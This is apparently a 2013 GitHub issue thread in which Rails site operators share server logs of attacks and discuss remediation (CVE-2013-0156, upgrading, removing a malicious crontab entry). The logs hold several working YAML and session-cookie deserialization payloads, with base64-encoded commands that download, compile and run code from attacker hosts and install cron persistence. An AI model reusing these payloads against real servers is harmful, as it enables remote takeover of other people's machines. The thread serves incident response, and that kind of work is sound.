Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.4ms)
Rendered layouts/_head.html.erb (3.3ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.5ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (2.4ms)
Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:42 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (93.0ms)
Rendered layouts/_head.html.erb (6.8ms)
Rendered layouts/_social_links.html.erb (3.1ms)
Rendered layouts/_messages.html.haml (2.9ms)
Rendered layouts/_header.html.erb (1.3ms)
Rendered layouts/_menu.html.erb (0.4ms)
Rendered layouts/_my_favs.html.haml (4.0ms)
Rendered layouts/_ride_request_form.html.erb (13.2ms)
Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:44 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.8ms)
Rendered layouts/_head.html.erb (5.1ms)
Rendered layouts/_social_links.html.erb (1.4ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (3.4ms)
Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:45 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.5ms)
Rendered layouts/_head.html.erb (3.3ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.5ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (2.3ms)
Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:12 +0000
Rendered /home/ggr/apps/ggr-dispatch/shared/bundle/ruby/1.9.1/gems/activeadmin-0.5.1/app/views/active_admin/resource/index.html.arb (3005.1ms)
Completed 200 OK in 3309ms (Views: 3197.3ms | ActiveRecord: 40.3ms)
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (86.6ms)
Rendered layouts/_head.html.erb (7.4ms)
Rendered layouts/_social_links.html.erb (4.2ms)
Rendered layouts/_messages.html.haml (4.0ms)
Rendered layouts/_header.html.erb (1.7ms)
Rendered layouts/_menu.html.erb (0.5ms)
Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:14 +0000
Error occurred while parsing request parameters.
Contents:
SyntaxError ((eval):1: syntax error, unexpected tFLOAT, expecting $end
wget http://88.198.20.247/k.c -O /tmp/k.c; gcc ...
^):
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:176:in eval' actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:176:indefine_hash_access'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:175:in module_eval' actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:175:indefine_hash_access'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:166:in block in define_named_route_methods' actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:164:ineach'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:164:in define_named_route_methods' actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:115:inadd'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych/visitors/to_ruby.rb:273:in `block in revive_hash'
Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:14 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[d2dldCBodHRwOi8vODguMTk4LjIwLjI0Ny9rLmMgLU8gL3RtcC9rLmM7IGdjYyAtbyAvdG1wL2sgL3RtcC9rLmM7IGNobW9kICt4IC90bXAvazsgL3RtcC9rfHx3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2sgLU8gL3RtcC9rICYmIGNobW9kICt4IC90bXAvayAmJiAvdG1wL2snKQ==].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.5ms)
Rendered layouts/_head.html.erb (3.7ms)
Rendered layouts/_social_links.html.erb (108.5ms)
Rendered layouts/_messages.html.haml (0.3ms)
Rendered layouts/_header.html.erb (0.7ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.4ms)
Rendered layouts/_ride_request_form.html.erb (3.0ms)
from 95.138.186.181:
Started GET "/" for 95.138.186.181 at 2013-05-26 01:16:17 +0000
Processing by PagesController#show as HTML
Parameters: {"<id type"=>""yaml">", "#10"=>nil, "---"=>nil, "!ruby/object:Gem::Requirement"=>nil, "requirements:"=>nil, "- !ruby/object:Rack::Session::Abstract::SessionHash"=>nil, "env:"=>nil, "HTTP_COOKIE: "a"=>"BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgI3AXN5c3RlbSgnY3JvbnRhYiAtcjsgZWNobyAiMSAqICogKiAqIHdnZXQgLU8gLSBjb2xrb2xkdWxkLmNvbS9jbWQxfGJhc2g7d2dldCAtTyAtIGxvY2hqb2wuY29tL2NtZDJ8YmFzaDt3Z2V0ICAtTyAtIGRkb3MuY2F0LmNvbS9jbWQzfGJhc2g7Inxjcm9udGFiIC07d2dldCBodHRwOi8vODguMTk4LjIwLjI0Ny9rLmMgLU8gL3RtcC9rLmM7IGdjYyAtbyAvdG1wL2sgL3RtcC9rLmM7IGNobW9kICt4IC90bXAvazsgL3RtcC9rfHx3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2sgLU8gL3RtcC9rICYmIGNobW9kICt4IC90bXAvayAmJiAvdG1wL2snKQoKBjoGRVQ6DEBtZXRob2Q6C3Jlc3VsdA=="", "by: !ruby/object:Rack::Session::Cookie"=>nil, "coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}"=>nil, "key: a"=>nil, "secrets: "=>[nil], "exists: true"=>nil, ""=>nil, "id"=>"home"}
Rendered inline template within layouts/heavy (80.4ms)
Rendered layouts/_head.html.erb (3.4ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (2.4ms)
Started GET "/" for 95.138.186.181 at 2013-05-26 03:06:59 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (1.2ms)
Rendered layouts/_head.html.erb (9.4ms)
Rendered layouts/_social_links.html.erb (2.9ms)
Rendered layouts/_messages.html.haml (4.3ms)
Rendered layouts/_header.html.erb (1.9ms)
Rendered layouts/_menu.html.erb (0.6ms)
Rendered layouts/_my_favs.html.haml (5.3ms)
Rendered layouts/_ride_request_form.html.erb (14.7ms)
Started GET "/" for 95.138.186.181 at 2013-05-26 03:07:01 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (5.2ms)
Rendered layouts/_social_links.html.erb (1.4ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (3.7ms)
Started GET "/" for 95.138.186.181 at 2013-05-26 03:07:02 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.4ms)
Rendered layouts/_head.html.erb (3.1ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.5ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (2.4ms)
Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:05 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (0.9ms)
Rendered layouts/_head.html.erb (12.5ms)
Rendered layouts/_social_links.html.erb (2.3ms)
Rendered layouts/_messages.html.haml (3.3ms)
Rendered layouts/_header.html.erb (134.1ms)
Rendered layouts/_menu.html.erb (0.8ms)
Rendered layouts/_my_favs.html.haml (4.6ms)
Rendered layouts/_ride_request_form.html.erb (13.1ms)
Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:06 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (5.5ms)
Rendered layouts/_social_links.html.erb (1.6ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.7ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.9ms)
Rendered layouts/_ride_request_form.html.erb (4.2ms)
Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:08 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.6ms)
Rendered layouts/_head.html.erb (3.9ms)
Rendered layouts/_social_links.html.erb (1.2ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (2.9ms)
from 188.190.126.105:
Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:01 +0000
Error occurred while parsing request parameters.
Contents:
Psych::SyntaxError ((): control characters are not allowed at line 1 column 1):
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:in parse' /usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:inparse_stream'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:151:in `parse'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:127:in `load'
Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:01 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (1.1ms)
Rendered layouts/_head.html.erb (7.1ms)
Rendered layouts/_social_links.html.erb (3.5ms)
Rendered layouts/_messages.html.haml (3.0ms)
Rendered layouts/_header.html.erb (1.6ms)
Rendered layouts/_menu.html.erb (0.7ms)
Rendered layouts/_my_favs.html.haml (4.7ms)
Rendered layouts/_ride_request_form.html.erb (15.1ms)
Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:04 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCJ3Z2V0IC1PIC92YXIvdG1wL2sgMTg4LjE5MC4xMjQuMTIwL2thaXRlbi1iaW4iKQpzeXN0ZW0oImNobW9kICt4IC92YXIvdG1wL2siKQpzeXN0ZW0oIi92YXIvdG1wL2siKQpzeXN0ZW0oJ2Nyb250YWIgLXInKQpzeXN0ZW0oJyhjcm9udGFiIC1sIDsgZWNobyAiKiAxICogKiAqIHdnZXQgLU8gL3Zhci90bXAvayAxODguMTkwLjEyNC4xMjAva2FpdGVuLWJpbiAmJiBjaG1vZCAreCAvdmFyL3RtcC9rICYmIC92YXIvdG1wL2siKSB8IGNyb250YWIgLScp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.9ms)
Rendered layouts/_head.html.erb (6.0ms)
Rendered layouts/_social_links.html.erb (1.7ms)
Rendered layouts/_messages.html.haml (0.5ms)
Rendered layouts/_header.html.erb (0.9ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (3.5ms)
Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:01 +0000
Error occurred while parsing request parameters.
Contents:
Psych::SyntaxError ((): control characters are not allowed at line 1 column 1):
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:in parse' /usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:inparse_stream'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:151:in `parse'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:127:in `load'
Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:02 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (9.7ms)
Rendered layouts/_social_links.html.erb (1.7ms)
Rendered layouts/_messages.html.haml (0.6ms)
Rendered layouts/_header.html.erb (1.0ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (3.4ms)
Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:05 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCJ3Z2V0IC1PIC92YXIvdG1wL2suYyAxODguMTkwLjEyNC4xMjAva2FpdGVuLXNyYy5jIikKc3lzdGVtKCJnY2MgLW8gL3Zhci90bXAva2EgL3Zhci90bXAvay5jIikKc3lzdGVtKCJjaG1vZCAreCAvdmFyL3RtcC9rYSIpCnN5c3RlbSgiL3Zhci90bXAva2EiKQpzeXN0ZW0oJ2Nyb250YWIgLXInKQpzeXN0ZW0oJyhjcm9udGFiIC1sIDsgZWNobyAiKiAxICogKiAqIHdnZXQgLU8gL3Zhci90bXAvay5jIDE4OC4xOTAuMTI0LjEyMC9rYWl0ZW4tc3JjLmMgJiYgZ2NjIC1vIC92YXIvdG1wL2thIC92YXIvdG1wL2suYyAmJiBjaG1vZCAreCAvdmFyL3RtcC9rYSAmJiAvdmFyL3RtcC9rYSIpIHwgY3JvbnRhYiAtJyk=].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.1ms)
Rendered layouts/_head.html.erb (155.5ms)
Rendered layouts/_social_links.html.erb (1.3ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.9ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (3.0ms)
Regards.
bu2
commented
May 27, 2013
|
Regarding me I am on Rails 3.2.8 with custom application. I have spotted 3 IPs which were sending malicious request to one of our server: The malicious requests are messing with YAML parameters and Session Cookie. from 88.198.20.247: Started GET "/" for 88.198.20.247 at 2013-05-24 12:50:17 +0000 Rendered layouts/_ride_request_form.html.erb (2.4ms)Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:14 +0000 Rendered layouts/_ride_request_form.html.erb (15.2ms)Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:15 +0000 Rendered layouts/_ride_request_form.html.erb (4.5ms)Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:16 +0000 Rendered layouts/_ride_request_form.html.erb (2.9ms)Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:30 +0000 Rendered layouts/_ride_request_form.html.erb (14.3ms)Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:33 +0000 Rendered layouts/_ride_request_form.html.erb (3.7ms)Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:34 +0000 Rendered layouts/_ride_request_form.html.erb (2.4ms)Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:42 +0000 Rendered layouts/_ride_request_form.html.erb (13.2ms)Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:44 +0000 Rendered layouts/_ride_request_form.html.erb (3.4ms)Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:45 +0000 Rendered layouts/_ride_request_form.html.erb (2.3ms)Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:12 +0000 Rendered layouts/_menu.html.erb (0.5ms)Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:14 +0000 SyntaxError ((eval):1: syntax error, unexpected tFLOAT, expecting $end /usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych/visitors/to_ruby.rb:273:in `block in revive_hash'Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:14 +0000 from 95.138.186.181: Started GET "/" for 95.138.186.181 at 2013-05-26 01:16:17 +0000 Rendered layouts/_ride_request_form.html.erb (2.4ms)Started GET "/" for 95.138.186.181 at 2013-05-26 03:06:59 +0000 Rendered layouts/_ride_request_form.html.erb (14.7ms)Started GET "/" for 95.138.186.181 at 2013-05-26 03:07:01 +0000 Rendered layouts/_ride_request_form.html.erb (3.7ms)Started GET "/" for 95.138.186.181 at 2013-05-26 03:07:02 +0000 Rendered layouts/_ride_request_form.html.erb (2.4ms)Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:05 +0000 Rendered layouts/_ride_request_form.html.erb (13.1ms)Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:06 +0000 Rendered layouts/_ride_request_form.html.erb (4.2ms)Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:08 +0000 from 188.190.126.105: Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:01 +0000 Psych::SyntaxError ((): control characters are not allowed at line 1 column 1): /usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:127:in `load'Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:01 +0000 Rendered layouts/_ride_request_form.html.erb (15.1ms)Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:04 +0000 Rendered layouts/_ride_request_form.html.erb (3.5ms)Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:01 +0000 Psych::SyntaxError ((): control characters are not allowed at line 1 column 1): /usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:127:in `load'Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:02 +0000 Rendered layouts/_ride_request_form.html.erb (3.4ms)Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:05 +0000 Regards. |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Netmisa
May 27, 2013
It's one of the stable ones, sorry I can't check now.
Ruby version: 1.9.3-p327
Rails version: 3.2
Netmisa
commented
May 27, 2013
|
It's one of the stable ones, sorry I can't check now. Ruby version: 1.9.3-p327 |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
conqueringlion93
May 27, 2013
Hi here !
I've disconnected my server until finding solution .. and I believe I have it :
chmod 700 /usr/bin/wget
=> http://forums.cpanel.net/f185/wget-abuse-hack-340232.html
this is a recent thread .. so I will test it tonight..
more search about subject, it seems to be this exploit :
conqueringlion93
commented
May 27, 2013
|
Hi here ! I've disconnected my server until finding solution .. and I believe I have it : chmod 700 /usr/bin/wget => http://forums.cpanel.net/f185/wget-abuse-hack-340232.html more search about subject, it seems to be this exploit : |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
conqueringlion93
May 27, 2013
after doing the chmod on wget, I receive another log from my server :
/bin/sh: wget: Permission denied
/bin/sh: wget: Permission denied
/bin/sh: wget: Permission denied
not forget to vi /var/spool/cron/crontabs/www-data
and delete the line about wget
conqueringlion93
commented
May 27, 2013
|
after doing the chmod on wget, I receive another log from my server : /bin/sh: wget: Permission denied not forget to vi /var/spool/cron/crontabs/www-data |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
conqueringlion93
May 27, 2013
last informations,
I'm running Rails 3.2.3 with ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]
conqueringlion93
commented
May 27, 2013
|
last informations, I'm running Rails 3.2.3 with ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux] |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
ErneX
May 27, 2013
Are you running nginx < 1.4.1? http://mailman.nginx.org/pipermail/nginx-announce/2013/000112.html
ErneX
commented
May 27, 2013
|
Are you running nginx < 1.4.1? http://mailman.nginx.org/pipermail/nginx-announce/2013/000112.html |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
packetlss
May 27, 2013
This is an exploit of an old Rails bug (CVE-2013-0156).
Clean your systems and update to 3.2.12.
In the future, make sure you subscribe to the rubyonrails-security mailing list to keep up to date with patches.
https://groups.google.com/forum/?fromgroups#!forum/rubyonrails-security
packetlss
commented
May 27, 2013
|
This is an exploit of an old Rails bug (CVE-2013-0156). Clean your systems and update to 3.2.12. In the future, make sure you subscribe to the rubyonrails-security mailing list to keep up to date with patches. https://groups.google.com/forum/?fromgroups#!forum/rubyonrails-security |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
tomfakes
May 27, 2013
I'm building an application with will integrate with GitHub to alert you when a vulnerability is found in any of the Gems that your application uses.
For this case, you would have received an alert when the Rails vulnerabilities were found, and would then have had time to update your application before an attacker got access.
Sign up to be informed when this is ready here: http://www.rubyaudit.com
tomfakes
commented
May 27, 2013
|
I'm building an application with will integrate with GitHub to alert you when a vulnerability is found in any of the Gems that your application uses. For this case, you would have received an alert when the Rails vulnerabilities were found, and would then have had time to update your application before an attacker got access. Sign up to be informed when this is ready here: http://www.rubyaudit.com |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
rogerthat
commented
May 27, 2013
|
please update your rails-installation: |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
borski
May 27, 2013
The Gem::Requirements piece makes me think its the Rails YAML parameter vulnerability from a few months ago. Even if you've updated versions, you may still be vulnerable. You can check here to see if that's the bug: https://www.tinfoilsecurity.com/railscheck
If your server has been compromised, you must rebuild from scratch - updating versions isn't enough.
borski
commented
May 27, 2013
|
The Gem::Requirements piece makes me think its the Rails YAML parameter vulnerability from a few months ago. Even if you've updated versions, you may still be vulnerable. You can check here to see if that's the bug: https://www.tinfoilsecurity.com/railscheck If your server has been compromised, you must rebuild from scratch - updating versions isn't enough. |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
tekknolagi
